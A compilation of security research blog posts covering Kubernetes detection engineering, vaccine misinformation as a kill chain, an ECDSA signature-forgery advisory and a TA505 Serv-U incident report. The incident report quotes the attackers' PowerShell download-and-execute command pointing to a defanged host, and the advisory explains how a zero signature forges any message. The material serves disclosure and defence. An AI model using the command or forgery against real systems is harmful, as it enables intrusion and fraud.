The major behaviour we have not gone into detail in this post is how Kubernetes handles Role-Based Access Control (RBAC). RBAC is a complex topic in Kubernetes and warrants its own blog post to go into all the different ways it can be abused. However, in any system it is worth alerting on high privilege permissions being assigned to users and this should be handled in any Kubernetes detections as well.

A ‘short lived disposable container’ is another behaviour that can indicate malicious behaviour. Shell access to containers configured with tty set to true, and a restart policy set to never are highly suspicious on an operational cluster. It’s unlikely there is a genuine need for this, and it could indicate an attacker trying to cover up their tracks.

Finally, the source IP is present in all audit log events. Any request outside of expected IP ranges should be alerted on, particularly for public IP ranges as this may indicate that the API server has been accidentally exposed to the internet.

Anomalies

One of the questions we asked ourselves was “How do we know when a pod has been created for malicious purposes?”. There are multiples ways a pod could be configured that would allow some form of privilege escalation. However, each of these configurations have a legitimate use case and it is only when they are used in a way that deviates from normal behaviour that they become suspicious.

In order to create detections for this the following assumption was made; pods created by a single company will following similar patterns in their configuration and deviations from these patterns would include pods that are suspicious and would be worthwhile putting in front of an analyst to investigate further.

Anomaly detection by Clustering

To do this we used a technique called clustering. This blog will not go into many details of exactly how the clustering works, some SIEMs such as Splunk have built in functions to allow this kind of processing to be done with minimal effort. Clustering involves taking multiple features of an object, in this case the configurations of the pod, and grouping the objects so that the objects with similar features are in the same group. The easiest way of describing clustering and how we can find anomalies is through visualising it.

The diagram shows a set of objects that are split into clusters based on their 2 features. It’s trivial to see 2 large groups of points, cluster 1 and cluster 2, that have been grouped based on feature similarity. The assumption would be that any object in these clusters are normal. The anomaly is the red triangle, since its features do not follow the pattern of the other objects and therefore would be worth further investigation.

Feature Extraction

The important part is choosing the right features to cluster on. We want to identify features of pod creation that remain consistent during normal activity (e.g., the user creating the pod and the registry of the container image) since changes in these would indicate suspicious behaviour. Also, we want to identify settings that could allow some form of privilege escalation, changes in these settings could indicate a malicious pod being created. For this we consulted our internal containerisation team and the list of the features decided upon can be found in the table below. Also included is the json path to find these field in the audit log.

Feature Description JSON path in audit log
Image Registry Registry the container image is stored. Effective when using a custom container registry requestObject.spec.container.image
User User sending the request. Effective when a subset of users create pods user.username
Privilege Container When enabled, privileged containers have access to all devices on the host requestObject.spec.container.securityContext.privileged
Mounted Volumes Indicates which directories on the host the container has access to. Mounting /host gives access to all files on host requestObject.spec.container.volumeMounts.mountPaths
HostNetwork When enabled container has access to any service running on localhost on the host requestObject.spec.container.HostNetwork
HostIPC When enabled container share IPC namespace. Allows inter-process communication with process on host requestObject.spec.container.HostIPC
HostPID When enabled containers share the PID namespace on the host. Allows for process listing of the host requestObject.spec.container.HostPID

Bringing it all together

Splunk contains a cluster command which is perfect for this use case. By creating a single string of the features delimited by a character of our choice, we can assign all pod creation events to a cluster. The exact time period to run the command over is subject to a trade-off between performance of the detection and performance of the query. The longer the lookback, the less chance of false positives, but the longer the time the query takes to run. After some trial and error, we found 14 days was a good middle ground but could be increased up to 30 days for smaller environments.

Once the cluster command has run, we can look for any events assigned to a cluster where the overall size of the cluster is relatively small. These will be events that are sufficiently different from the rest that we will want to flag them as suspicious and have an analyst investigate further.

Conclusions

So to wrap things up, the use of Kubernetes is increasing so therefore detection engineering of this technology becomes an important problem to tackle. Kubernetes Audit logs allow us to tackle this as they are a great source of events within the Kubernetes cluster and importantly are consistent across all platforms that run a Kubernetes cluster. A good detection engineering strategy has multiple layers and includes a variety of detections based on signatures, behaviours, and anomalies. In particular for Kubernetes, we want to be focusing our efforts on abuse of privileges and the creation of pods. There are multiple approaches to doing this, a few of which we have introduced in this post.

NCC Group Research

Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain

The open and wide-reaching nature of social media platforms have led them to become breeding grounds for misinformation, the most recent casualty being COVID-19 vaccine information. Misinformation campaigns launched by various sources for different reasons but working towards a common objective – creating vaccine hesitancy – have been successful in triggering and amplifying the cynical nature of people and creating a sense of doubt about the safety and effectiveness of vaccines. This blog post discusses one of our first attempts within NCC Group to examine misinformation from the perspective of a security researcher, as a part of our broader goal of using techniques inspired by digital forensics, threat intelligence, and other fields to study misinformation and how it can be combatted.

Developing misinformation countermeasures requires a multidisciplinary approach. The MisinfoSec Working Group is a part of the Credibility Coalition – an interdisciplinary research committee which aims to develop common standards for information credibility – which is developing a framework to understand and describe misinformation attacks using existing cybersecurity principles [1]

In this blogpost, which is part 1 of a series, we take a page out of their book and use the Cyber Kill Chain attack framework to describe the COVID-19 vaccine misinformation attacks occurring on social media platforms like Twitter and Facebook. In the next blogpost, we will use data from studies which analyze the effects of misinformation on vaccination rates to perform a formal risk analysis of vaccine misinformation on social media.

An Overview of the Cyber Kill Chain

The Cyber Kill Chain is a cybersecurity model which describes the different stages in a cyber-based attack. It was developed based on the “Kill Chain” model [2] used by the military to describe how enemies attack a target. By breaking down the attack into discrete steps, the model helps identify vulnerabilities at each stage and develop defense mechanisms to thwart attackers or force them to make enough noise to detect them.

Vaccine Misinformation Attacks as a Cyber Kill Chain

In this section, we use the Cyber Kill Chain defined by Lockheed Martin [3] to describe how misinformation attacks occur on social media. The goal is to study these attacks from a cybersecurity perspective in order to understand them better and come up with solutions by addressing vulnerabilities in each stage of the attack.

In this scenario, we assume that the “attackers” or “threat actors” are individuals or organizations whose objective is to create a sense of confusion about the COVID-19 vaccines. They could be motivated by a variety of factors like money, political agenda, religious beliefs, and so on. For instance, evidence was recently found to indicate the presence of Russian disinformation campaigns on social media [4][5] which attack the Biden administration’s vaccine mandates and sow distrust in the Pfizer and Moderna vaccines to promote the Russian Sputnik vaccine. Anti-vaccine activists, alternative health entrepreneurs and physicians have also been found to be responsible for a lot of the COVID-19 vaccine hoaxes circulating on social media sites including Facebook, Instagram and Twitter [6].

We also assume that the “asset” at risk is the COVID-19 vaccine information on social media, and the “targets” range from government and health organizations to regular users of social media.

Step 1: Reconnaissance

There are two types of reconnaissance:

1. Passive reconnaissance: The attacker acquires information without interacting with the target actors. Since social media platforms are public, this kind of recon is easy for attackers to perform. They can monitor the activity of users with public profiles, follow trends, and study and analyze existing measures in place for thwarting misinformation spread. They can also find existing misinformation created both intentionally or as a joke (spoofs or satire) which they could later use out of context.
2. Active reconnaissance: The attacker interacts with the target to acquire information. In this case, it could mean connecting with users having private profiles by impersonating a legitimate user, using phishing tactics to learn about the targets such as their political affiliation, vaccine opinions and vaccination status (if it is not already publicly available). The attacker could also create an account to snoop around and study other user activity, the social media platform activity and test the various misinformation prevention measures on a small scale.

Step 2: Weaponization

This stage involves the creation of the attack payload i.e., the misinformation. These could be advertisements, posts, images, and links to websites which contain misinformation. The misinformation could be blatantly false information, semantically incorrect information or out of context truths. For example, conspiracy theories like “The COVID-19 vaccines contain microchips that are used to track people” [7] are blatantly false. Blowing up the rare but serious side effects of the vaccine out of proportion is an example of misinformation as truth out of context. Deepfakes can also be used to create convincing misinformation. Spoof videos or misinformation generated accidentally that were already online could also be used by attackers to further their own cause [8].

A lot of social media platforms have been implementing tight restrictions on COVID-19 related posts, so it would be prudent for the attacker to create a payload which can circumvent those restrictions for as long as possible.

Step 3: Delivery

Once the misinformation sources are ready, it needs to be deployed onto social media to reach the target people. This involves creating fake accounts, impersonating legitimate user accounts, making parody accounts/hate groups, and using deep undercover accounts that were created during the recon stage. The recon stage also reveals users or influencers whose beliefs align with the anti-vaccine misinformation which the attacker is attempting to spread. The attackers could convince these users – either through monetary means or by appealing to their shared objective – to spread the misinformation i.e., deliver the payload.

Step 4: Exploitation

The exploitation stage in this scenario refers to the misinformation payloads successfully bypassing misinformation screeners used by the social media platforms (if they exist) and reaching the target demographic i.e., anti-vaxxers, people who are on the fence about the vaccine etc.

Despite several misinformation prevention measures being used by various social media platforms (refer Table 1), there still seems to be a significant presence and spread of misinformation online. Spreading misinformation on a large scale overwhelms the social media platforms [13] and adds complexity to their misinformation screening process since it requires manual intervention a lot of the time and the manpower available is very less compared to the large volume of misinformation. A study found that some social media sites allowed advertisements with coronavirus misinformation to be published [14], suggesting that some countermeasures may not always be effectively implemented.

The other vulnerability which attackers try to exploit has more to do with human nature and psychology. A study by YouGov [15] showed that 20% of Americans believe that it is “definitely true” or “probably true” that there is a microchip in the COVID-19 vaccines. This success rate of the conspiracy theory was attributed to the coping mechanism of humans to make sense of things which cannot be explained, or when there is a sense of uncertainty [16]. “Anti-vaxxers” have been around for a long time, and with the COVID-19 vaccines there is an even deeper sense of mistrust because of the shorter duration in which it was developed and tested. The overall handling of the COVID-19 pandemic by some government organizations has also been disappointing for the public. Attackers use this sense of chaos and confusion to their advantage to stir the pot further with their misinformation payloads.

Step 5: Installation

The installation stage of the cyber kill chain usually refers to the malware installation by attackers on the target system after delivering the payload. With respect to vaccine misinformation attacks, this stage refers to rallying groups of people and communities towards the attacker’s cause, either online and/or in physical locations. These users act as further carriers of the misinformation across various social media platforms, reinforcing it through reshares, reposts, retweets etc., leading to the misinformation gaining attention and popularity.

Step 6: Command and Control

Once the attacker gains control over users who have seen the misinformation and interacted with it, they can incite further conflict in the conversations surrounding the misinformation, such as through comments of a post. They can also manipulate users into arranging or attending anti-vax rallies or protest vaccine mandates, causing a state of civil unrest.

Step 7: Actions on Objectives

It is safe to assume that usually the objective of attackers performing vaccine misinformation attacks is to lower the vaccination rates. This objective can also be extended further and tied to other motives. For example, foreign state-sponsored misinformation attacks target US-developed vaccines, such as the Moderna and Pfizer mRNA vaccines, could have been created in order to suggest the superiority of vaccines developed in other nations.

It is important to realize that the purpose of misinformation campaigns is not always to convince people that things are a certain way – rather, can simply be to seed doubt in a system, or in the quality of information available, making people more confused, overwhelmed, angry, or afraid. The sheer volume of misinformation available online has caused for some people a state of hesitancy and cynicism about the safety and effectiveness of the vaccines, even among people who are not typically “anti-vax”. Attackers generally aim to plant seeds of doubt in as many people’s minds as possible rather than attempting to convince them to not take the vaccine, since confusion is often sufficient to reduce vaccination rates.

Defenses and Mitigations to the Misinformation Kill Chain

The use of the Cyber Kill Chain allows us to not only consider the actions of attackers in the context of information security, but to also consider appropriate defensive actions (both operational and technical). In this section, we will elaborate on the defensive actions that can be taken against various stages in the Misinformation Kill Chain.

In keeping with the well-known information security concepts of layered defense [17] and defense in depth [18], the countermeasures should support and reinforce each other so that, for example, if an attacker is able to bypass technical controls in order to deploy an attack, then staff should step up to respond appropriately and follow an incident response procedure.

The increasing concern about misinformation on social media has resulted in studies by governments in several countries [19], which provide suggestions for combatting the issue, and indications of which countermeasures have been effective [20][21][22]. Some of the measures are applicable at multiple stages of the kill chain. For example, the labelling of misinformation is intended to make a user less likely to read it, less likely to share it and less likely to believe it.

The following countermeasures can be applied at different stages of the kill chain, to help stem the propagation of misinformation and to limit its effectiveness:

Step 1: Reconnaissance

1. Limiting the availability of useful metadata, tracking/logging of site visits, reduce the data that is visible without login in order to limit information gathering, about both individuals as well as aggregate populations of individuals.
2. Limiting group interaction for non-members in order to restrict anonymous or non-auditable reconnaissance.
3. Implementing effective user verification during account creation to prevent fake accounts.
4. Educating users about spoofing attacks and encourage them to keep their profiles private and accept requests cautiously.

Step 2: Weaponization

1. Using effective misinformation screeners to block users from creating and posting ads, images, videos or posts with misinformation.
2. Labelling misinformation or grading it according to reliability (based on effective identification), in order to allow users to make a more informed decision on what they read.
3. Removing misinformation (based on effective identification) to prevent it from reaching its target.

Step 3: Delivery

1. Recognition or identification (followed by either removal or marking) of misinformation using machine learning (ML), human observation or a combination of both.
2. Recognition or identification (followed by either removal or suspension) of hostile actors using machine learning (ML), human observation or a combination of both.
3. Identification and removal of bots, especially when used for hostile purposes.

Step 4: Exploitation

1. Public naming of hostile actors in order to limit acceptance of their posts and raise awareness of their motivations and credibility.
2. Encouraging members of the medical field to combat the large volumes misinformation with equally large volumes of valid and thoroughly vetted information about the safety and effectiveness of, in this case, the COVID-19 vaccines [22].
3. Analyzing and improving the effectiveness of the misinformation prevention measures on social media platforms.
4. Demanding and obtaining transparency and strong messaging from government organizations.

Step 5: Installation

1. Labelling misinformation or grading it according to reliability (based on effective identification).
2. Tracking and removing misinformation (based on effective identification) in order to control its spread.

Step 6: Command and Control

1. Removal of groups or users with a record of repeatedly posting misinformation.
2. Suspending accounts to influence better behavior, in the case of minor transgressions.

Step 7: Actions on Objectives

1. Media Literacy education – this is not a short-term measure but has been reported as very effective in Scandinavia [22] and is proposed as a countermeasure by the US DHS [20] to increase the resilience of the public to misinformation on social media by teaching them how to identify fake news stories and differentiate between facts and opinions.
2. Fact checking – a wider presence of easily accessible sources for the general public and for journalists may assist in wider recognition of misinformation and help to form a general habit of checking against a reliable source.
3. Pro-vaccine messaging on social media – encourage immunizations on social media emphasizing immediate and personalized benefits of taking the vaccines, rather than long-term protective or societal benefits since studies in health communications have shown the former approach to be much more effective than the latter [24]. Studies have also shown that using visual means than textual can magnify those benefits [25].

In Part 2 of this blog post series: Risk Analysis of Vaccine Misinformation Attacks

Since social media is an integral part of people’s lives and is often a primary source of information and news for many users, it is safe to assume that it influences the vaccination rates and vaccine hesitancy among its users. This in turn affects the ability of the population to achieve herd immunity and increases the number of people who are more likely to die from COVID-19. Several studies have been conducted recently attempting to understand and quantitatively measure the effects of vaccine misinformation on vaccination rates. Each of these studies used different approaches and metrics across different social media platforms to perform the analysis, but they all conclude the same thing in the end – misinformation lowers intent to accept a COVID-19 vaccine. In our next post in this series, we will look at the results of these studies in more detail and use them to perform a risk analysis of misinformation attacks.

References:

[23] Hernandez RG, Hagen L, Walker K, O’Leary H, Lengacher C. The COVID-19 vaccine social media infodemic: healthcare providers’ missed dose in addressing misinformation and vaccine hesitancy. Hum Vaccin Immunother. 2021 Sep 2;17(9):2962-2964. doi: 10.1080/21645515.2021.1912551. Epub 2021 Apr 23. PMID: 33890838; PMCID: PMC8381841.

NCC Group Research

Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)

Vendor: Stark Bank's open-source ECDSA cryptography libraries
Vendor URL: https://starkbank.com/, https://github.com/starkbank/
Versions affected:
- ecdsa-python (https://github.com/starkbank/ecdsa-python) v2.0.0
- ecdsa-java (https://github.com/starkbank/ecdsa-java) v1.0.0
- ecdsa-dotnet (https://github.com/starkbank/ecdsa-dotnet) v1.3.1
- ecdsa-elixir (https://github.com/starkbank/ecdsa-elixir) v1.0.0
- ecdsa-node (https://github.com/starkbank/ecdsa-node) v1.1.2
Author: Paul Bottinelli [email protected]
- ecdsa-python: https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1
- ecdsa-java: https://github.com/starkbank/ecdsa-java/releases/tag/v1.0.1
- ecdsa-dotnet: https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2
- ecdsa-elixir: https://github.com/starkbank/ecdsa-elixir/releases/tag/v1.0.1
- ecdsa-node: https://github.com/starkbank/ecdsa-node/releases/tag/v1.1.3
CVE Identifiers:
- ecdsa-python: CVE-2021-43572
- ecdsa-java: CVE-2021-43570
- ecdsa-dotnet: CVE-2021-43569
- ecdsa-elixir: CVE-2021-43568
- ecdsa-node: CVE-2021-43571
Risk: Critical (universal signature forgery for arbitrary messages)

Summary

Stark Bank is a financial technology company that provides services to simplify and automate digital banking, by providing APIs to perform operations such as payments and transfers. In addition, Stark Bank maintains a number of cryptographic libraries to perform cryptographic signing and verification. These popular libraries are meant to be used to integrate with the Stark Bank ecosystem, but are also accessible on popular package manager platforms in order to be used by other projects. The node package manager reports around 16k weekly downloads for the ecdsa-node implementation while the Python implementation boasts over 7.3M downloads in the last 90 days on PyPI. A number of these libraries suffer from a vulnerability in the signature verification functions, allowing attackers to forge signatures for arbitrary messages which successfully verify with any public key.

Impact

An attacker can forge signatures on arbitrary messages that will verify for any public key. This may allow attackers to authenticate as any user within the Stark Bank platform, and bypass signature verification needed to perform operations on the platform, such as send payments and transfer funds. Additionally, the ability for attackers to forge signatures may impact other users and projects using these libraries in different and unforeseen ways.

Details

The (slightly simplified) ECDSA verification of a signature $(r, s)$ on a hashed message $z$ with public key $Q$ and curve order $n$ works as follows:

• Check that $r$ and $s$ are integers in the $[1, n-1]$ range, return Invalid if not.
• Compute $u_1 = zs^{-1} \mod n$ and $u_2 = rs^{-1} \mod n$.
• Compute the elliptic curve point $(x, y) = u_1 G + u_2 Q$, return Invalid if $(x, y)$ is the point at infinity.
• Return Valid if $r \equiv x \mod n$, Invalid otherwise.

The ECDSA signature verification functions in the libraries listed above fail to perform the first check, ensuring that the r and s components of the signatures are in the correct range. Specifically, the libraries are not checking that the components of the signature are non-zero, which is an important check mandated by the standard, see X9.62:2005, Section 7.4.1/a:

1. If r’ is not an integer in the interval [1, n-1], then reject the signature.
2. If s’ is not an integer in the interval [1, n-1], then reject the signature.

For example, consider the following excerpt of the verify function from the ecdsa-python implementation.

def verify(cls, message, signature, publicKey, hashfunc=sha256):
byteMessage = hashfunc(toBytes(message)).digest()
numberMessage = numberFromByteString(byteMessage)
curve = publicKey.curve
r = signature.r
s = signature.s
inv = Math.inv(s, curve.N)
u1 = Math.multiply(curve.G, n=(numberMessage * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
u2 = Math.multiply(publicKey.point, n=(r * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
return r == modX

In that code snippet, the values r and s are extracted from the signature without any range check. An attacker supplying a signature equal to (r, s) = (0, 0) will not see their signature rejected. Proceeding with the verification, this function computes the inverse of the s component. Note that the Math.inv() function returns zero when supplied with a zero input (even though 0 does not admit an inverse). The code then computes the values u1 = inv * numberMessage * G and u2 = inv * r * Q, but since inv is zero, u1 and u2 will both be zero, i.e., the point at infinity, regardless of the value of numberMessage (the message hash, which we called $z$ above) and Q (the public key). Subsequently, the implementation computes the intermediary curve point add by adding up the two previously computed points, which again results in the point at infinity. The final line checks that the r-component of the signature is equal to the x-coordinate of the curve point, essentially checking that 0 == 0 for all any message and any public key. Therefore, a signature (r, s) = (0, 0) is deemed valid by the code for any message, and under any public key.

Recommendation

Users of the different Stark Bank ECDSA libraries should update to the latest versions. Specifically, versions larger or at least equal to the following should be used.

• ecdsa-python: v2.0.1
• ecdsa-java: v1.0.1
• ecdsa-dotnet: v1.3.2
• ecdsa-elixir v1.0.1
• ecdsa-node v1.1.3

Vendor Communication

2021-11-04 – NCC Group reported the vulnerability to Stark Bank developers.
2021-11-04 – Stark Bank acknowledged the issue and started fixing all vulnerable libraries.
2021-11-05 – Stark Bank confirmed that all vulnerable libraries were fixed.
2021-11-08 – Advisory published.

Thanks to

The support team at Stark Bank for their prompt acknowledgement and response, and Jennifer Fernick, Aaron Haymore, Kevin Henry, Marie-Sarah Lacharité, Thomas Pornin, Giacomo Pope and Javed Samuel at NCC Group for their support and careful review during the disclosure process.

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 2021-11-08

Written by:  Paul Bottinelli

NCC Group Research

TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

NCC Group’s global Cyber Incident Response Team has observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor. TA505 is a known cybercrime threat actor, who is known for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the section below on checks for potential compromise.

Execution

We observed that Base64 encoded PowerShell commands were logged shortly after the Serv-U exceptions indicating exploitation. The PowerShell commands ultimately led to deployment of a Cobalt Strike Beacon on the system running the vulnerable Serv-U software.

The PowerShell command observed deploying Cobalt Strike was:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://IP:PORT/a'))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled task named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly backup the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP-servers in your network and checking these logs for traces of similar exceptions as suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds describe follow-up activity regarding a completely different threat actor than we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of the vulnerability. The first indicator of compromise for the exploitation of this vulnerability are suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder. Looking at this log file it contains exceptions at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content:

# Check for altered RegIdleBackup taskExport-ScheduledTask -TaskName "RegIdleBackup" -TaskPath "\Microsoft\Windows\Registry\" | Select-String -NotMatch "{CA767AA8-9157-4604-B64B-40747123D5F2}"

# Check for suspicious CLSID registry key contentGet-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID{SUSPICIOUS_CLSID}'

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

• Check if your Serv-U version is vulnerable
• Locate the Serv-U’s DebugSocketlog.txt
• Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
• Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
• Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
• In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
• If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021 after Microsoft published about the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Top vulnerable versions identified:

References

NCC Group Research

Public Report – Zcash NU5 Cryptography Review

In March 2021, Electric Coin Co. engaged NCC Group to perform a review of the upcoming network protocol upgrade NU5 to the Zcash protocol (codenamed “Orchard”). The review was to be performed over multiple phases: first, the specification document changes and the relevant ZIPs, then, in June 2021, the implementation itself.

NCC Group Research

The Next C Language Standard (C23)

by Robert C. Seacord

The cutoff for new feature proposals for the next C Language Standard (C23) has come and gone meaning that we know some of the things that will be in the next standard and all of the things that will not be. There are still a bunch of papers that have been submitted but not yet adopted into C23. Some of these papers will be accepted, some will be rejected, and potentially some good ideas won’t make it because of lack of time to perfect them and gain consensus. NCC Group has already had a number of proposals accepted into C23. This blog posts reviews an additional five papers that we have submitted which are currently under consideration.

Clarifying integer terms v2

During a committee discussion of the behavior of calloc, it became clear that the committee lacks a consensus definition of terms such as “overflow” and “wraparound” that are commonly used to discuss integer arithmetic. As a result, the committee can’t answer the simple question “do unsigned numbers overflow?”.

This paper [N2837] is unlikely to change the behavior of the language. However, having taught Secure Coding in C and C++ for 16 years I can tell you it is extremely important that we have a common shared vocabulary to discuss language behaviors; especially behaviors like overflow and wraparound that commonly result in exploitable vulnerabilites.

Identifier Syntax using Unicode Standard Annex 31

Unicode® Standard Annex #31 Unicode Identifier and Pattern Syntax [Davis 2009] describes specifications for recommended defaults for the use of Unicode in the definitions of identifiers and in pattern-based syntax and has been adopted by has been adopted by C++, Rust, Python, and other languages. By adopting the recommendations of UAX #31, C will be easier to work with in international environments and less prone to accidental problems. This paper [N2836] also aligns the C language with other current languages that defer to Unicode UAX #31 for identifier syntax.

calloc Wraparound Handling

RUS-CERT [RUS-CERT 2002, Weimer 2002] documented the defect in calloc implementations and similar routines:

Integer overflow can occur during the computation of the memory region size by calloc and similar functions. As a result, the function returns a buffer which is too small, possibly resulting in a subsequent buffer overflow.

While most implementations were repaired, the standard was not updated to clarify the existing requirement.

The problem subsequently reoccurred [MSRC 2021]. The same vulnerability exists in standard memory allocation functions spanning widely used real-time operating systems (RTOS), embedded software development kits (SDKs), and C standard library (libc) implementations. This paper [N2810] clarifies the existing behavior of calloc in the event that nmemb * size wraps around, to help prevent future implementation defects resulting in security vulnerabilities.

Annex K Repairs

Annex K Bounds-checking interfaces provides alternative library functions that promote safer, more secure programming. Annex K contains the *_s functions verify that output buffers are large enough for the intended result and return a failure indicator if they are not. Annex K’s set_constraint_handler_s function is specified to set the global process-wide runtime-constraint handler and return a pointer to the previously registered process-wide handler. However, because the process-wide handler is shared among all threads in a program, it is not well-suited for multithreaded programs where code runs in separate threads. This paper [N2809] proposes two alternative solutions for using constraint handlers in multithreaded programs.

Volatile C++ Compatibility

The volatile keyword imposes restrictions on access and caching and is often necessary for memory that can be externally modified. Some uses of the volatile keyword are ambiguous, incorrect, or insecure. Consequently, C++ has deprecated many of these uses[P1152R4]. This paper [N2743] proposed deprecating these same uses of the volatile keyword in C for the same reasons, and to maintain compatibility with C++.

References

[Davis 2009] Mark Davis. Unicode Standard Annex #31 Unicode Identifier and Pattern Syntax. September, 2009. URL: http://www.unicode.org/reports/tr31/tr31-11.html

[MSRC 2021] MSRC Team. “BadAlloc” – Memory allocation vulnerabilities could affect wide range of IoT and OT devices in industrial, medical, and enterprise networks. April 29, 2021. URL: https://msrcblog.microsoft.com/2021/04/29/badalloc-memory-allocation-vulnerabilities-could-affect-widerange-of-iot-and-ot-devices-in-industrial-medical-and-enterprise-networks/

[N2743] Robert C. Seacord. Volatile C++ Compatibility. May, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2743.pdf

[N2809] Robert C. Seacord. Annex K Repairs. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2809.pdf

[N2810] Robert C. Seacord. calloc wraparound handling. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2810.pdf

[N2836] Robert C. Seacord. Identifier Syntax using Unicode Standard Annex 31. October, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2836.pdf

[N2837] Robert C. Seacord, Clarifying integer terms v2. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2837.pdf

[P1152R4] JF Bastien. Deprecating volatile. 19 July 2019. URL: http://wg21.link/P1152R4

[RUS-CERT 2002] RUS-CERT Advisory. Flaw in calloc and similar routines 2002-08:02. URL:

[Weimer 2002] Florian Weimer. RUS-CERT Advisory 2002-08:02: Flaw in calloc and similar routines. August, 2002. URL: https://www.opennet.ru/base/cert/1028651886_905.txt.html

NCC Group Research

Conference Talks – November 2021

This month, members of NCC Group will be presenting their work at the following conferences:

• Jennifer Fernick & David Wheeler (Linux Foundation), “Keynote: Securing Open Source Software”, to be presented at The Linux Foundation Member Summit (November 2-4 2021)
• Brian Hong, “Sleight of ARM: Demystifying Intel Houdini”, to be presented at Ekoparty (November 2-6 2021)
• Sanne Maasakkers, “Phish like an APT: Phenomenal pretexting for persuasive phishing”, to be presented at Ekoparty (November 2-6 2021)
• Frans van Dorsselaer, “Symposium on Post-Quantum Cryptography: Act now, not later”, to be presented at the CWI Symposium on Post-Quantum Cryptography (November 3 2021)
• Pepjin Hack & Zong-Yu Wu, “We Wait, Because We Know You – Inside the Ransomware Negotiation Economics”, to be presented at Black Hat Europe 2021 (November 8-11 2021)
• Philip Marsden, “The 5G threat landscape”, to be presented at Control Systems Cybersecurity Europe 2021 (November 9-10 2021)
• Pepjin Hack (NCC Group), Kelly Jackson Higgins (Dark Reading, & Rik Turner (Omdia), “Dark Reading panel: Ransomware as the New Normal”, to be presented at Black Hat Europe (Business Hall) (November 10 2021)
